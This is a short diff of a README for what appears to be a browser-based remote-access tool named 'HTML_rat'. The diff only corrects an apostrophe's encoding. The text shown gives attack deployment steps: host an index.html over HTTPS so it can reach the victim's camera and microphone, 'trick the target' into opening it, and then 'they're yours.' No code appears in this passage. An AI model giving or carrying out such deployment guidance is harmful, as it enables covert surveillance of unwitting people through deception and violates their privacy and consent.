mr-r0ot/HTML_rat/README.md

 ### Step 3: Deploy the Trap

 - Host the `index.html` file on an HTTPS server (e.g., GitHub Pages, Netlify).
 HTTPS is mandatory for camera and mic access.
 - Trick the target into opening the file in their browser.
-Once they do, theyâ€™re yours.
+Once they do, they’re yours.

 ---